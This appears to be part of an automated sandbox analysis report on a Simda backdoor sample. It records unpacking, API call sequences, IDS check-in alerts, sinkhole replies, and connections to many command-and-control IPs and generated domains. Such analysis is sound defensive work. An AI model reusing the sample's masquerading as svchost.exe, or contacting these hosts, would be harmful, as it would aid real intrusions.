    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 23.2.cUKxeliGgCix.exe.3200000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 27.2.cUKxeliGgCix.exe.1590000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 31.2.cUKxeliGgCix.exe.1040000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeUnpacked PE file: 37.2.cUKxeliGgCix.exe.3140000.2.unpack
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeUnpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack
    Source: C:\Windows\apppatch\svchost.exeUnpacked PE file: 1.2.svchost.exe.400000.0.unpack
    Source: 5AFlyarMds.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55332 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55335 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55360 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55363 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54050 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54059 version: TLS 1.2
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cUKxeliGgCix.exe, 00000005.00000000.2077994915.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2078822725.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000008.00000002.2333587412.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000D.00000000.2083432315.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000F.00000002.2111175988.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000013.00000002.2111926666.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000015.00000000.2111093320.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000017.00000002.2119064943.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000019.00000000.2117612935.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001B.00000002.2125197875.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001D.00000002.2127871048.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001F.00000000.2126229043.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000021.00000000.2129102058.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000023.00000000.2133478694.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000025.00000002.2142572120.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000027.00000002.2147362137.000000000059E000.00000002.00000001.01000000.00000009.sdmp
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02CBDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02CBDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02CB9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C97680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02C97680
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAE6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_02F8DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_02F8DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F89910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_02F89910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F67680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02F67680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0257DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0257DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02579910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02579910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02557680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02557680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_025EDA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_025EDAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_025E9910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DD120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C7680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_025C7680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DE6B0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,1_2_02CBE0FB

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.4:59394
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55331 -> 23.253.46.64:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55325 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55328 -> 69.162.80.62:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55322 -> 178.162.203.226:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55321 -> 23.253.46.64:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55323 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49732 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55324 -> 18.208.156.248:80
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:55325
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:55325
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:55324
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55330 -> 3.64.163.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51509 -> 15.197.240.20:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55343 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:55324
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55344 -> 69.162.80.62:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55326 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55327 -> 3.94.10.34:80
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:55327
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:55327
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55329 -> 154.212.231.82:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51508 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55334 -> 178.162.203.226:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55357 -> 13.248.169.48:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55359 -> 103.150.11.230:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51511 -> 154.85.183.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55320 -> 3.64.163.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51512 -> 103.224.212.108:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51517 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51515 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51510 -> 103.224.182.252:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55358 -> 18.208.156.248:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51516 -> 64.225.91.73:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54054 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51518 -> 52.34.198.229:80
    Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.4:51518
    Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.4:51518
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54065 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:49733 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54047 -> 154.212.231.82:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54048 -> 178.162.203.226:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54045 -> 3.64.163.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54049 -> 23.253.46.64:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55356 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54053 -> 3.64.163.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54043 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54062 -> 154.85.183.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51936 -> 44.221.84.105:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:51507 -> 64.225.91.73:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54046 -> 23.253.46.64:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54052 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:61260 -> 199.191.50.83:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54056 -> 103.150.11.230:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54066 -> 72.52.179.174:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54044 -> 208.100.26.245:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54060 -> 103.224.182.252:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54061 -> 103.224.212.108:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:61261 -> 3.64.163.50:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54042 -> 69.162.80.62:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54055 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54051 -> 178.162.203.226:80
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55332 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55360 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55335 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54057 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54050 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:54059 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.4:55363 -> 188.114.96.3:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 15.197.240.20 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.108 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: gacyqys.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: gatyzys.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vojypat.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 47.103.150.18 8001Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.91.196.145 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vonycum.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 69.162.80.62 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lymyjix.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: vocydyc.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.226 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.11.230 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.64.163.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: volycik.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: qekynyv.com
    Source: C:\Windows\apppatch\svchost.exeDomain query: volydyk.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
